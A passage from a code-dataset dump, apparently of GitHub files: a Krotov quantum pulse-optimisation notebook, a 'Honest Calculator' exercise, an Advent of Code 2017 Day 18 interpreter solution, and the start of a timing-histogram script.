steps=5)\n\n\n# In[ ]:\n\n\nqubit_pulses = [H[2][1](t, 0) for t in tlist]\n#qubit_pulses_filtered = apply_spectral_filter(copy.deepcopy(qubit_pulses), tlist, 0, 0.5)\nplot_spectrum(qubit_pulses, tlist, mark_freq=[0, -K_q, -K_q/2], pos=0, xlim=[-2*π,2*π])\n#plot_spectrum(qubit_pulses_filtered, tlist, mark_freq=[0, K_q], pos=0, xlim=[-2*K_q,2*K_q])\n#plot_pulse(qubit_pulses, tlist)\n#plot_pulse(qubit_pulses_filtered, tlist)\n#plot_spectrum(qubit_pulses[1], time_list, mark_freq=[ω_q, ω_q + K_q, ω_q - K_q], pos=0)\n\n\n# ## Optimize\n\n# In[ ]:\n\n\n# Frequency limits for spectral filter (not used)\nω_0 = 0\nω_1 = np.abs(K_q/2)\n\n\n# In[ ]:\n\n\ndef modify_params(**kwargs):\n \n spectral_filtering = False\n \n if spectral_filtering:\n # Spectral filtering\n tlist = kwargs['tlist']\n dt = tlist[1] - tlist[0] # assume equi-distant time grid\n n = len(tlist) - 1 # = len(pulse)\n # remember that pulses are defined on intervals of tlist\n ω = np.abs(np.fft.fftfreq(n, d=dt / (2.0 * π)))\n # the normalization factor 2π means that w0 and w1 are angular\n # frequencies, corresponding directly to energies in the Hamiltonian\n # (ħ = 1).\n flt = (ω_0 <= ω) * (ω <= ω_1)\n # flt is the (boolean) filter array, equivalent to an array of values 0\n # and 1 \n\n shape_arrays = kwargs['shape_arrays']\n for (i, (pulse, shape)) in enumerate(zip(kwargs['optimized_pulses'], shape_arrays)):\n spectrum = np.fft.fft(pulse)\n # apply the filter by element-wise 
multiplication\n spectrum[:] *= flt[:]\n # after the inverse fft, we should also multiply with the\n # update shape function. Otherwise, there is no guarantee that\n # the filtered pulse will be zero at t=0 and t=T (assuming that\n # is what the update shape is supposed to enforce). Also, it is\n # important that we overwrite `pulse` in-place (pulse[:] = ...)\n kwargs['optimized_pulses'][i][:] = np.fft.ifft(spectrum).real * shape\n \n # Limit pulse amplitude to 1\n for i in range(len(kwargs['optimized_pulses'])):\n #kwargs['optimized_pulses'][i] = savgol_filter(kwargs['optimized_pulses'][i], 9, 2) # Smooth pulse\n \n pulse_max = np.max(np.abs(kwargs['optimized_pulses'][i]))\n if pulse_max > amp_max:\n kwargs['optimized_pulses'][i] = (amp_max*np.array(kwargs['optimized_pulses'][i])/pulse_max)\n kwargs['optimized_pulses'][i] = np.fmax(np.fmin(kwargs['optimized_pulses'][i], kwargs['shape_arrays'][i]), -np.array(kwargs['shape_arrays'][i]))\n \n #conv = 3*σ\n #if (conv % 2 == 0): conv += 1\n #kwargs['optimized_pulses'][i] = savgol_filter(kwargs['optimized_pulses'][i], conv, 2)\n # Plot pulse shapes every 50th iteration\n #if kwargs['iteration'] % 50 == 0:\n # plot_pulse(kwargs['optimized_pulses'][i], kwargs['tlist'][:-1], kwargs['tlist'][-1])\n # plot_spectrum(kwargs['optimized_pulses'][i], kwargs['tlist'][:-1], mark_freq=[0, -K_q, -K_q/2], mark_color=['r','g','b'], pos=0, xlim=[-(2*π), (2*π)])\n # Update λ\n #fac = 1\n #steps = 5\n #λₐ = kwargs['lambda_vals'][0]\n #for i in range(len(kwargs['lambda_vals'])):\n # kwargs['lambda_vals'][i] = λₐ * fac\n # lambda_a = λₐ * fac\n #print(\"λₐ = {}\".format(kwargs['lambda_vals']))\n\n\n# In[ ]:\n\n\n# Reset results\nopt_result = None\n\n\n# In[ ]:\n\n\ndef convergence_reason(opt_result):\n if opt_result == None:\n return True\n reasons = ['monotonic', 'iterations']\n for r in reasons:\n if opt_result.message.find(r)>0:\n return r\n if opt_result.message.find('F_oc')>0 or opt_result.message.find('Δ')>0:\n return False\n\n\n# In[ ]:\n\n\ndef run_optim(T, lambda_a, ϕ):\n σ = T/6\n opt_result = None\n print('T = {}'.format(T))\n sample_rate = 4 # Gigasamples/s\n tlist = np.linspace(0, T, samples_rate*int(np.ceil(T)))\n s_pulse = None\n H = hamiltonian(ampl0=1, use_rotating=True, start_pulse=s_pulse, T=T, phase=np.exp(-1j*ω_q*T))\n \n S_start = [zero_pulse, start_pulse]\n S_funs = [S, S]\n for i, H_i in enumerate(H[1:]):\n H_i[1] = shape_field(H_i[1], S_start[i], T, σ)\n #H_i[1] = shape_field(H_i[1], S_funs[i], T, σ)\n plot_pulse(H_i[1], tlist)\n \n objectives = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H) for ψ in state_rot(ϕ, T)]\n \n # Check if guess pulse realises\n guess_dynamics = [ob.mesolve(tlist, options=qutip.Options(nsteps=50000)) for ob in objectives]\n final_state = guess_dynamics[0].states[-1]\n dm = final_state * ϕ[0][1].dag()\n fid = np.abs((final_state.dag() * ϕ[0][1]).full()[0][0])**2\n if fid > F_oc_tar:\n print('Guess pulse realises transfer already.')\n return True\n \n pulse_options = {H_i[1]: dict(lambda_a=lambda_a, shape=lambda t: S_funs[i](t, T=T, σ=σ)) for i, H_i in enumerate(H[1:])}\n #pulse_options = {\n # H[2][1]: dict(lambda_a=lambda_a, shape=0),\n # H[1][1]: dict(lambda_a=lambda_a, shape=lambda t: S_funs[0](t, T=T, σ=σ)), \n #}\n while convergence_reason(opt_result):\n if convergence_reason(opt_result) == 'monotonic':\n break\n #lambda_a *= 2\n # print('λₐ = {}'.format(lambda_a))\n # pulse_options = {H_i[1]: dict(lambda_a=lambda_a, shape=lambda t: S_funs[i](t, T)) for i, H_i in enumerate(H[1:])}\n #iters = 5\n #if 
opt_result is not None:\n # iters = opt_result.iters[-1] + iters\n\n opt_result = krotov.optimize_pulses(\n objectives,\n pulse_options=pulse_options,\n tlist=tlist,\n propagator=krotov.propagators.expm,\n chi_constructor=krotov.functionals.chis_ss,\n info_hook=krotov.info_hooks.chain(\n krotov.info_hooks.print_table(J_T=F_oc),\n print_fidelity\n ),\n check_convergence=krotov.convergence.Or(\n krotov.convergence.value_above(F_oc_tar, name='F_oc'),\n krotov.convergence.delta_below(1e-9),\n #krotov.convergence.check_monotonic_fidelity,\n ),\n modify_params_after_iter = modify_params,\n #iter_stop=1,\n continue_from = opt_result,\n store_all_pulses=True,\n )\n print(opt_result.message)\n opt_result.dump(os.path.join(os.getcwd(),'results','{}_pi_pulse_optim_{}.dat'.format(current_time(),T)))\n\n\n# In[ ]:\n\n\nstep_size = pulse_max(0)*2. # Higher numbers can lead to instability while lower can make convergence much slower\nλ = 1/step_size\nϕ = [[ basis(L,0), (basis(L,1)).unit() ]] # Initial and target states\n\nexisting_times = [float(file.split('_')[4][:-4]) for file in os.listdir('results')]\nt_times = np.flip(np.arange(1,21.5,1)) # List of pulse lengths to optimise for\n#t_times = [55.]\n\nfor tot in t_times:\n if tot not in [float(file.split('_')[4][:-4]) for file in os.listdir('results')]:\n #plot_cardinal(state_rot(ϕ, tot)[0])\n if tot.is_integer():\n tot = int(tot)\n run_optim(tot, λ, ϕ)\n else:\n print('T = {} already exists'.format(tot))\n\n\n# ## Plot optimized results (unused)\n\n# In[ ]:\n\n\nfolder = 'best_results_ge' # best_results_ge or best_results_gf\nresults = [(krotov.result.Result.load(os.path.join(os.getcwd(),folder,file), objectives=get_objectives(T=float(file.split('_')[-1][:-4]))), float(file.split('_')[-1][:-4])) for file in os.listdir(folder) if file[-4:]=='.dat']\nget_ipython().run_line_magic('matplotlib', 'inline')\n#%matplotlib notebook\n#print(vars(results[0][0]))\n#plot_results_3d(results)\n#ax = plot_results_pulse_length(results, iteration=0, shape='.',color='g')\n#ax = plot_results_pulse_length(results, iteration=10000, shape='.', ax=ax)\n#ax.legend(['1st iter.','Last iter.'])\n#ax.legend(('1st iter.', 'Last iter.'))\n#plot_results_iteration(results)\nplot_results_pulse_length_iterations(results)\n#matplotlib2tikz.save(\"fidelity-length-gf.tikz\")\n\n\n# In[ ]:\n\n\nfor i in range(len(results)+1):\n ax = plot_results_pulse_length(results, iteration=i)\n ax.set_title('Iteration {}'.format(i))\n plt.savefig('gif/{}.png'.format(i))\n ax.clear()\n\n\n# In[ ]:\n\n\ndef plot_pulse_both(pulse, pulse2, tlist, T=None):\n fig, ax = plt.subplots(2,1,figsize=(7.5,8))\n if callable(pulse):\n pulse = np.array([pulse(t, args=None) for t in tlist])\n if np.any(np.iscomplex(pulse)):\n ax[0].plot(tlist, np.real(pulse))\n ax[0].plot(tlist, np.imag(pulse))\n ax[0].legend(['Re', 'Im'])\n else:\n ax[0].plot(tlist, pulse)\n if T is not None:\n ax[0].plot(tlist, [S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n ax[0].plot(tlist, [-S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n #ax[0].set_xlabel('Time (ns)')\n ax[0].set_ylabel('Re($\\Omega$)')\n ax[0].set_ylim([-amp_max*1.05,amp_max*1.05])\n \n if callable(pulse2):\n pulse = np.array([pulse2(t, args=None) for t in tlist])\n if np.any(np.iscomplex(pulse2)):\n ax[1].plot(tlist, np.real(pulse2))\n ax[1].plot(tlist, np.imag(pulse2))\n ax[1].legend(['Re', 'Im'])\n else:\n ax[1].plot(tlist, pulse2)\n if T is not None:\n ax[1].plot(tlist, [S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n 
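# mirrored (negative) bound of the pulse-shape envelope S(t)\n        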
ax[1].plot(tlist, [-S(t, T) for t in tlist], color='k', linestyle='--', linewidth=1)\n ax[1].set_xlabel('Time (ns)')\n ax[1].set_ylabel('Im($\\Omega$)')\n ax[1].set_ylim([-amp_max*1.05,amp_max*1.05])\n return fig\n\n\n# In[ ]:\n\n\n\nr = results[1][0]\ntilist = r.tlist[0:-1]\nfor i in range(len(r.all_pulses)):\n fig = plot_pulse_both(r.all_pulses[i][0], r.all_pulses[i][1], tilist)\n fig.axes[0].set_title('Iteration {}'.format(i))\n fig.savefig('gif/{}.png'.format(i))\n plt.close()\n# ax.clear()\n\n\n# In[ ]:\n\n\nplot_results_pulse_length(results, iteration=20, ax=ax)\nax = plt.axes()\ndef interactive_plot(iteration):\n plot_results_pulse_length(results, iteration=iteration, ax=ax)\ninteract(interactive_plot, iteration=widgets.IntSlider(min=0,max=900,step=1,value=0));\n\n\n# In[ ]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# # Analyze\n\n# In[ ]:\n\n\nfolder = 'best_results_ge'\n#ϕ = [[ basis(L,0), basis(L,1) ]]\nresults = [(krotov.result.Result.load(os.path.join(os.getcwd(),folder,file), objectives=get_objectives(T=float(file.split('_')[-1][:-4]))), float(file.split('_')[-1][:-4])) for file in os.listdir(folder) if file[-4:]=='.dat']\n#results = [(krotov.result.Result.load(os.path.join(os.getcwd(),folder,file)), float(file.split('_')[-1][:-4])) for file in os.listdir(folder) if file[-4:]=='.dat']\nresults = sorted(results, key=lambda x : x[1])\nprint(len(results))\nidx_list = [0,7,15,23,63,-1] # 0->1\n#idx_list = [0,2,4,6,7,-1] # 0->2\nres = []\nfor i in idx_list:\n res = res+[results[i]]\nresults = res\nfor T in results:\n print(T[1])\n #print(len(T[0].tau_vals))\n #if T[0].message[21] is 'F':\n # print(T[1])\n\n\n# In[ ]:\n\n\n#T_q = (2*π)/ω_q\nsteps2 = len(results[0][0].tlist)*1000\nlightness = 1\nfor (r,T) in results:\n tlist = r.tlist\n #opt_dynamics = [ob.mesolve(tlist, progress_bar=True) for ob in r.objectives]\n #qubit_occupation(opt_dynamics[0])\n \n \n c = r.optimized_controls\n tlist2 = np.linspace(0, tlist[-1], steps2)\n Ω = c[0]+1j*c[1]\n #puls = np.abs(Ω)\n #fas = np.angle(Ω)\n Ω = np.interp(tlist2, tlist, Ω)\n pulses_lab = [np.conj(Ω)*np.exp(1j*ω_q*tlist2), np.conj(Ω)*np.exp(-1j*ω_q*tlist2)]\n \n #opt_dynamics = [ob.mesolve(tlist, progress_bar=True) for ob in r.optimized_objectives]\n '''\n fig = plot_pulse(r.guess_controls[0], tlist)\n fig = plot_pulse(c[0], tlist, fig=fig)\n fig.axes[0].set_ylabel('Re($\\Omega$)')\n #fig.axes[0].legend(['Guess', 'Optim.'])\n matplotlib2tikz.save(\"../Figures/Results/pulse_shape_{}_Real.tikz\".format(str(T).replace('.',',')),\n figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n \n fig = plot_pulse(r.guess_controls[1], tlist)\n fig = plot_pulse(c[1], tlist, fig=fig)\n fig.axes[0].set_ylabel('Re($\\Omega$)')\n fig.axes[0].legend(['Guess', 'Optim.'])\n matplotlib2tikz.save(\"../Figures/Results/pulse_shape_{}_Imag.tikz\".format(str(T).replace('.',',')),\n figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n '''\n #qubit_occupation(opt_dynamics[0])\n #matplotlib2tikz.save(\"../Figures/Results/qubit_occ_{}.tikz\".format(str(T).replace('.',',')),\n # figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n \n col = lightness*np.array([0.121569, 0.466667, 0.705882])\n if T==22.0 or T==4.25:\n fig = plot_spectrum(pulses_lab[0], tlist2, mark_freq=[ω_q+K_q, ω_q, ω_q-K_q],mark_color=[u'#1f77b4', u'#ff7f0e', u'#2ca02c'], pos=0, xlim=[ω_q*0.8, ω_q*1.2], col=col)\n elif T==55. 
or T==30.:\n fig = plot_spectrum(pulses_lab[0], tlist2, mark_freq=[ω_q+K_q, ω_q, ω_q-K_q],mark_color=[u'#1f77b4', u'#ff7f0e', u'#2ca02c'], pos=0, xlim=[ω_q*0.8, ω_q*1.2], fig = fig,col=col)\n else:\n fig = plot_spectrum(pulses_lab[0], tlist2, xlim=[ω_q*0.8, ω_q*1.2], fig = fig,col=col)\n #fig.axes[0].set_title('Spectrum of pulse (lab frame)')\n #fig.axes[0].legend(['Spec.',r'$\\omega_{01}$',r'$\\omega_{12}$',r'$\\omega_{02}$'])\n #matplotlib2tikz.save(\"../Figures/Results/pulse_spectrum_{}.tikz\".format(str(T).replace('.',',')),\n # figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n lightness -= 0.1\n \n '''\n final_state = opt_dynamics[0].states[-1]\n #target_state = r.objectives[0].target\n fig, ax = qutip.visualization.hinton(final_state*final_state.dag())\n matplotlib2tikz.save(\"../Figures/Results/hinton_gf_{}.tikz\".format(str(T).replace('.',',')),\n figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\n \n fig = plot_evolution(opt_dynamics)\n fig.save(name=\"../Figures/Results/bloch_evolution_{}.png\".format(str(T).replace('.',',')))\n #fig = plot_spectrum(pulses_lab[1], tlist2, mark_freq=[-ω_q, -ω_ef, -ω_gf],mark_color=['r','g','b'], pos=0, xlim=[-ω_q*0.8, -ω_q*1.2])\n #fig.axes[0].set_title('Spectrum of Im($\\omega$)')\n #fig.axes[0].legend(['Spec.',r'$\\omega_{01}$',r'$\\omega_{12}$',r'$\\omega_{02}$'])\n #H_lab = hamiltonian(ampl0=1, use_rotating=False, pulses=pulses_lab)\n #objectives_lab = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H_lab) for ψ in ϕ]\n '''\n#fig.axes[0].legend(['22 ns','000','000','000','24 ns','26 ns','28 ns','29 ns','55 ns']);\nfig.axes[0].legend(['4.25 ns','000','000','000','10 ns','30 ns','10 ns','20 ns','30 ns']);\nfig.axes[0].set_title('Spectrum of pulse (lab frame)');\nfig.axes[0].set_ylabel('Pulse amplitude');\n#fig.axes[0].legend(['Spec.',r'$\\omega_{01}$',r'$\\omega_{12}$',r'$\\omega_{02}$'])\nmatplotlib2tikz.save(\"../Figures/Results/pulse_spectrum_qubit.tikz\",\n figureheight = '\\\\figureheight',figurewidth = '\\\\figurewidth')\nsubprocess.call(\"../Figures/Results/move_files.sh\", shell=False)\n\n\n# In[ ]:\n\n\n# Move figures to Latex folder\n#os.system(['wsl.exe','../Figures/Results/move_files.sh'])\nsubprocess.call(\"../Figures/Results/move_files.sh\", shell=False)\n\n\n# In[ ]:\n\n\nxlabels = ['$|0\\\\rangle$','$|1\\\\rangle$','$|2\\\\rangle$']\nylabels = ['$\\\\langle 0|$','$\\\\langle 1|$','$\\\\langle 2|$']\n#final_state = desuperposition(opt_dynamics[0].states[-1], F_err)\n\n#target_state = results[0][0].objectives[0].target\nplot_matrix_final_target(target_state, final_state, xlabels, ylabels, el=45, az=150)\nplot_matrix_final_target(target_state, final_state, xlabels, ylabels, el=10, az=150)\nplot_cardinal([target_state, final_state])\nplot_evolution(opt_dynamics)\n\n#cmap = matplotlib.cm.RdBu\n#norm = matplotlib.colors.Normalize(-1, 1)\n#matplotlib.colorbar.ColorbarBase(fig.axes[1], norm=norm, cmap=cmap);\n\n\n# In[ ]:\n\n\nT_q = (2*π)/ω_q\nsteps2 = len(results[0][0].tlist)*1000\nfor (r,_) in results:\n tlist = r.tlist\n #opt_dynamics = [ob.mesolve(tlist, progress_bar=True) for ob in r.objectives]\n #qubit_occupation(opt_dynamics[0])\n \n c = r.optimized_controls\n tlist2 = np.linspace(0, tlist[-1], steps2)\n Ω = c[0]+1j*c[1]\n Ω = np.interp(tlist2, tlist, Ω)\n pulses_lab = [Ω*np.exp(1j*ω_q*tlist2), np.conj(Ω)*np.exp(-1j*ω_q*tlist2)]\n opt_dynamics = [ob.mesolve(tlist, progress_bar=True) for ob in r.optimized_objectives]\n plot_pulse(r.guess_controls[0], tlist)\n 
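# report the peak amplitude of the imaginary quadrature of the guess pulse\n    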
print(np.max(r.guess_controls[1]))\n plot_pulse(r.guess_controls[1], tlist)\n plot_pulse(c[0], tlist)\n plot_pulse(c[1], tlist)\n plot_pulse(pulses_lab[0], tlist2)\n plot_pulse(pulses_lab[1], tlist2)\n qubit_occupation(opt_dynamics[0])\n plot_spectrum(pulses_lab[0], tlist2, mark_freq=[ω_q, ω_ef, ω_gf],mark_color=['r','g','b'], pos=0, xlim=[ω_q*0.9, ω_q*1.1])\n #plot_spectrum(pulses_lab[1], tlist2, mark_freq=[ω_q, ω_ef, ω_gf], pos=0, xlim=[-ω_q*0.95, -ω_q*1.05])\n #H_lab = hamiltonian(ampl0=1, use_rotating=False, pulses=pulses_lab)\n #objectives_lab = [krotov.Objective(initial_state=ψ[0], target=ψ[1], H=H_lab) for ψ in ϕ]\n \n \n\n","repo_name":"JohanWinther/cat-state-encoding","sub_path":"Krotov/Pi Pulse test only qubit.py","file_name":"Pi Pulse test only qubit.py","file_ext":"py","file_size_in_byte":33860,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"74745491089","text":"# write your code here\ndef is_one_digit(v):\n try:\n if not float(v).is_integer():\n return False\n except ValueError:\n return False\n else:\n if -10 < v < 10:\n return True\n else:\n return False\n\n\ndef check(v_1, v_2, v_3):\n msg = \"\"\n if is_one_digit(v_1) and is_one_digit(v_2):\n msg += \" ... lazy\"\n if (v_1 == 1 or v_2 == 1) and v_3 == \"*\":\n msg += \" ... very lazy\"\n if (v_1 == 0 or v_2 == 0) and (v_3 in [\"*\", \"+\", \"-\"]):\n msg += \" ... very, very lazy\"\n if msg != \"\":\n msg = \"You are\" + msg\n print(msg)\n\n\nnumbers_correct = False\noperation_correct = False\ndivision_by_zero = True\nmemory = 0\nresult = 0\nwhile not numbers_correct and not operation_correct and division_by_zero:\n print(\"Enter an equation\")\n calc = input()\n x, operation, y = calc.split()\n if x == \"M\":\n x = memory\n if y == \"M\":\n y = memory\n try:\n x = float(x)\n except ValueError:\n print(\"Do you even know what numbers are? Stay focused!\")\n else:\n try:\n y = float(y)\n except ValueError:\n print(\"Do you even know what numbers are? Stay focused!\")\n else:\n numbers_correct = True\n if numbers_correct:\n if operation != \"+\" and operation != \"-\" and operation != \"*\" and operation != \"/\":\n print(\"Yes ... an interesting math operation. You've slept through all classes, haven't you?\")\n numbers_correct = False\n else:\n operation_correct = True\n if operation_correct:\n check(x, y, operation)\n if operation == \"+\":\n result = x + y\n division_by_zero = False\n elif operation == \"-\":\n result = x - y\n division_by_zero = False\n elif operation == \"*\":\n result = x * y\n division_by_zero = False\n elif operation == \"/\" and y != 0:\n result = x / y\n division_by_zero = False\n else:\n print(\"Yeah... division by zero. Smart move...\")\n numbers_correct = False\n operation_correct = False\n ask_memory = True\n if not (not numbers_correct and not operation_correct and division_by_zero):\n while ask_memory:\n print(result)\n print(\"Do you want to store the result? (y / n):\")\n answer = input()\n if answer == \"y\":\n if is_one_digit(result):\n msg_index = 10\n print(\"Are you sure? It is only one digit! (y / n)\")\n reply = input()\n while reply not in [\"y\", \"n\"]:\n print(\"Are you sure? It is only one digit! (y / n)\")\n reply = input()\n if reply == \"y\":\n print(\"Don't be silly! It's just one number! Add to the memory? (y / n)\")\n reply = input()\n while reply not in [\"y\", \"n\"]:\n print(\"Don't be silly! It's just one number! Add to the memory? (y / n)\")\n reply = input()\n if reply == \"y\":\n print(\"Last chance! 
Do you really want to embarrass yourself? (y / n)\")\n reply = input()\n while reply not in [\"y\", \"n\"]:\n print(\"Last chance! Do you really want to embarrass yourself? (y / n)\")\n reply = input()\n memory = result\n else:\n memory = result\n ask_memory = False\n else:\n if answer == \"n\":\n ask_memory = False\n proper_answer = False\n while not proper_answer:\n print(\"Do you want to continue calculations? (y / n):\")\n continue_calcs = input()\n if continue_calcs == \"y\":\n proper_answer = True\n numbers_correct = False\n operation_correct = False\n division_by_zero = True\n elif continue_calcs == \"n\":\n proper_answer = True\n","repo_name":"jritxal/Honest-Calculator-Phyton-JBA-","sub_path":"Honest Calculator/task/honest_calc.py","file_name":"honest_calc.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28371875603","text":"# --- Day 18: Duet ---\n\n# You discover a tablet containing some strange assembly code labeled simply\n# \"Duet\". Rather than bother the sound card with it, you decide to run the code\n# yourself. Unfortunately, you don't see any documentation, so you're left to\n# figure out what the instructions mean on your own.\n\n# It seems like the assembly is meant to operate on a set of registers that are\n# each named with a single letter and that can each hold a single integer. You\n# suppose each register should start with a value of 0.\n\n# There aren't that many instructions, so it shouldn't be hard to figure out\n# what they do. Here's what you determine:\n\n# snd X plays a sound with a frequency equal to the value of X.\n\n# set X Y sets register X to the value of Y.\n\n# add X Y increases register X by the value of Y.\n\n# mul X Y sets register X to the result of multiplying the value contained in\n# register X by the value of Y.\n\n# mod X Y sets register X to the remainder of dividing the value contained in\n# register X by the value of Y (that is, it sets X to the result of X modulo\n# Y).\n\n# rcv X recovers the frequency of the last sound played, but only when the\n# value of X is not zero. (If it is zero, the command does nothing.)\n\n# jgz X Y jumps with an offset of the value of Y, but only if the value of X is\n# greater than zero. (An offset of 2 skips the next instruction, an offset of\n# -1 jumps to the previous instruction, and so on.)\n\n# Many of the instructions can take either a register (a single letter) or a\n# number. The value of a register is the integer it contains; the value of a\n# number is that number.\n\n# After each jump instruction, the program continues with the instruction to\n# which the jump jumped. After any other instruction, the program continues\n# with the next instruction. 
Continuing (or jumping) off either end of the\n# program terminates it.\n\n# For example:\n\n# set a 1\n# add a 2\n# mul a a\n# mod a 5\n# snd a\n# set a 0\n# rcv a\n# jgz a -1\n# set a 1\n# jgz a -2\n\n# The first four instructions set a to 1, add 2 to it, square it, and then set\n# it to itself modulo 5, resulting in a value of 4.\n\n# Then, a sound with frequency 4 (the value of a) is played.\n\n# After that, a is set to 0, causing the subsequent rcv and jgz instructions to\n# both be skipped (rcv because a is 0, and jgz because a is not greater than\n# 0).\n\n# Finally, a is set to 1, causing the next jgz instruction to activate, jumping\n# back two instructions to another jump, which jumps again to the rcv, which\n# ultimately triggers the recover operation.\n\n# At the time the recover operation is executed, the frequency of the last\n# sound played is 4.\n\n# What is the value of the recovered frequency (the value of the most recently\n# played sound) the first time a rcv instruction is executed with a non-zero\n# value?\n\n# --- Part Two ---\n\n# As you congratulate yourself for a job well done, you notice that the\n# documentation has been on the back of the tablet this entire time. While you\n# actually got most of the instructions correct, there are a few key\n# differences. This assembly code isn't about sound at all - it's meant to be\n# run twice at the same time.\n\n# Each running copy of the program has its own set of registers and follows the\n# code independently - in fact, the programs don't even necessarily run at the\n# same speed. To coordinate, they use the send (snd) and receive (rcv)\n# instructions:\n\n# snd X sends the value of X to the other program. These values wait in a queue\n# until that program is ready to receive them. Each program has its own message\n# queue, so a program can never receive a message it sent.\n\n# rcv X receives the next value and stores it in register X. If no values are\n# in the queue, the program waits for a value to be sent to it. Programs do not\n# continue to the next instruction until they have received a value. Values are\n# received in the order they are sent.\n\n# Each program also has its own program ID (one 0 and the other 1); the\n# register p should begin with this value.\n\n# For example:\n\n# snd 1\n# snd 2\n# snd p\n# rcv a\n# rcv b\n# rcv c\n# rcv d\n\n# Both programs begin by sending three values to the other. Program 0 sends 1,\n# 2, 0; program 1 sends 1, 2, 1. Then, each program receives a value (both 1)\n# and stores it in a, receives another value (both 2) and stores it in b, and\n# then each receives the program ID of the other program (program 0 receives 1;\n# program 1 receives 0) and stores it in c. Each program now sees a different\n# value in its own copy of register c.\n\n# Finally, both programs try to rcv a fourth time, but no data is waiting for\n# either of them, and they reach a deadlock. 
When this happens, both programs\n# terminate.\n\n# It should be noted that it would be equally valid for the programs to run at\n# different speeds; for example, program 0 might have sent all three values and\n# then stopped at the first rcv before program 1 executed even its first\n# instruction.\n\n# Once both of your programs have terminated (regardless of what caused them to\n# do so), how many times did program 1 send a value?\n\n################################################################################\n\nimport asyncio\nimport collections\n\ndef run(registers, instructions):\n def snd(x):\n registers['snd'] = arg_value(x)\n def set(x, y):\n registers[x] = arg_value(y)\n def add(x, y):\n registers[x] += arg_value(y)\n def mul(x, y):\n registers[x] *= arg_value(y)\n def mod(x, y):\n registers[x] %= arg_value(y)\n def rcv(x):\n if arg_value(x) != 0:\n registers['rcv'] = registers['snd']\n def jgz(x, y):\n if arg_value(x) > 0:\n return arg_value(y)\n else:\n return None\n def arg_value(x):\n if len(x) == 1 and x.isalpha():\n return registers[x]\n else:\n return int(x)\n\n pc = 0\n while pc < len(instructions):\n cmd, args = instructions[pc]\n operation = locals()[cmd]\n jump = operation(*args)\n if jump is not None:\n pc += jump\n else:\n pc += 1\n if registers['rcv'] != 0:\n break\n\nclass Deadlock(Exception): pass\n \nclass DuetCPU:\n def __init__(self, program_id):\n self.program_id = program_id\n self.registers = collections.defaultdict(lambda: 0)\n self.registers['p'] = program_id\n self.rcv_queue = asyncio.Queue()\n self.rcv_waiting = False\n self.snd_count = 0\n\n @property\n def is_blocking(self):\n return self.rcv_waiting and self.rcv_queue.empty()\n\n async def run(self, instructions, other_program):\n async def snd(x):\n self.snd_count += 1\n other_program.rcv_queue.put_nowait(arg_value(x))\n async def set(x, y):\n self.registers[x] = arg_value(y)\n async def add(x, y):\n self.registers[x] += arg_value(y)\n async def mul(x, y):\n self.registers[x] *= arg_value(y)\n async def mod(x, y):\n self.registers[x] %= arg_value(y)\n async def rcv(x):\n self.rcv_waiting = True\n if other_program.is_blocking and self.is_blocking:\n other_program.rcv_queue.put_nowait(None)\n raise Deadlock()\n value = await self.rcv_queue.get()\n if value is None:\n raise Deadlock()\n self.registers[x] = value\n self.rcv_waiting = False\n async def jgz(x, y):\n return arg_value(y) if arg_value(x) > 0 else None\n def arg_value(x):\n return self.registers[x] if x.isalpha() else int(x)\n\n pc = 0\n while pc >= 0 and pc < len(instructions):\n cmd, args = instructions[pc]\n operation = locals()[cmd]\n try:\n jump = await operation(*args)\n except Deadlock:\n break\n if jump is not None:\n pc += jump\n else:\n pc += 1\n other_program.rcv_queue.put_nowait(None)\n\ndef parse_instructions(instructions_input):\n def parse_line(line):\n cmd, *args = line.split(' ')\n return (cmd, args)\n return [parse_line(l) for l in instructions_input.strip().splitlines()]\n\nwith open('aoc18.txt', 'r') as f:\n instructions_input = f.read()\ninstructions = parse_instructions(instructions_input)\nregisters = collections.defaultdict(lambda: 0)\nrun(registers, instructions)\nprint(f'Part 1: Recovered frequency value {registers[\"rcv\"]}')\n\n\ncpu0 = DuetCPU(0)\ncpu1 = DuetCPU(1)\nasyncio.get_event_loop().run_until_complete(asyncio.gather(\n cpu0.run(instructions, cpu1),\n cpu1.run(instructions, cpu0)\n))\nprint(f'Part 2: Program 0/1 sent {cpu0.snd_count}/{cpu1.snd_count} 
values.')\n","repo_name":"dexman/AdventOfCode","sub_path":"2017/aoc18.py","file_name":"aoc18.py","file_ext":"py","file_size_in_byte":8760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11061566822","text":"'''\nConverts time-sampled data into distribution format\n'''\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfilename = \"PPSSer12\"\n\ncontents = open(filename+\".txt\", mode='r')\ncontentsTxt = contents.readlines()\ncontents.close()\n\nser_T = [0]*len(contentsTxt)\npps_T = [0]*len(contentsTxt)\n\nj = 0\nfor i in range(len(contentsTxt)):\n\tline = contentsTxt[i]\n\tif (',' in line):\n\t\tcommaLoc = line.index(',')\n\t\tser_T[j] = int(line[:commaLoc])\n\t\tpps_T[j] = int(line[commaLoc+1:])\n\t\tj += 1\n\t\t\nser_T = ser_T[:j+1]\npps_T = pps_T[:j+1]\n\nserser_dT = [0]*(len(ser_T)-1)\nppspps_dT = [0]*(len(ser_T)-1)\nserpps_dT = [0]*(len(ser_T))\no_n = 100\nserser_ndT = [0]*(len(ser_T)-o_n)\n\nfor i in range(len(ser_T)):\n\tserpps_dT[i] = ser_T[i]-pps_T[i]\nfor i in range(len(ser_T)-1):\n\tserser_dT[i] = ser_T[1+i]-ser_T[i]\n\tppspps_dT[i] = pps_T[1+i]-pps_T[i]\nfor i in range(len(serser_ndT)):\n\tserser_ndT[i] = ser_T[o_n+i]-ser_T[i]\n\t\nhistData = serpps_dT\n\n\n# apply maximum 